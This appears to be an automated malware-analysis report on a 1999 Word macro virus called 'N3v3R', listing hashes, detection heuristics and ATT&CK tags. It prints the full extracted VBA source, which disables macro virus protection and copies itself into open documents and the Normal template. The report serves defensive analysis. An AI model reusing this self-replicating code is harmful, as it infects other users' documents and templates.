Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7afddbd900b03015…

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-06-21 20:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b6e6740efb6a9d08acd0d9137a1db5ac SHA-1: d1081b08175153f38ff5f8f410bfea31e89c53d0 SHA-256: 7afddbd900b03015074e0f80dfb88a3a15915da0eaf5a1479d14e6373a53932b
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a WordBasic macro designed to infect other documents. The AutoClose macro is designed to copy its own code to the active document and the Normal template, effectively spreading the macro. While a payload to set a document password exists, it is intentionally never activated. The ClamAV detection 'Doc.Trojan.Ever-1' and the presence of the AutoClose macro strongly suggest malicious intent.

Heuristics 4

  • ClamAV: Doc.Trojan.Ever-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ever-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1328 bytes
SHA-256: 944ef8ebc8e2ba4cfd5e5e6c91c26aaff2b7b98e02ef129241422511a4c86545
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' N3v3R v1.0 by SPo0Ky[CB], 21st June 1999
' SR-1 Compatible MS-Word bug with 5 lines of code.
' Includes "the basic stuff", a small payload which
' would set a random password (though it never gets activated),
' and as a bonus it is even undetectable by F-Prot's and AVP's
' heuristics :-)

Sub AutoClose()
Options.VirusProtection = False ' the basic stuff you asked for :-)
x = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' gets the virus's code
If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the activedocument
If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the normaltemplate
If Day(Now) = "N3v3R" Then ActiveDocument.Password = ActiveDocument.Words(1) ' a payload which will never get activated, see it as a payload which actually just wastes time and space! :-)
End Sub